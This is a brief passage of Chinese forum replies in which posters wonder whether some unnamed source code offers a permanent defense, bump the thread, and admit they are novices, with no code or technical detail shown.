是不是会是一个永久的防御?

可是我没法实现,大家一起想下

记号~~~看看

顶下。看看

记号~~~看看

这个源码，对于高人来说是个好东东，对于我菜鸟来说，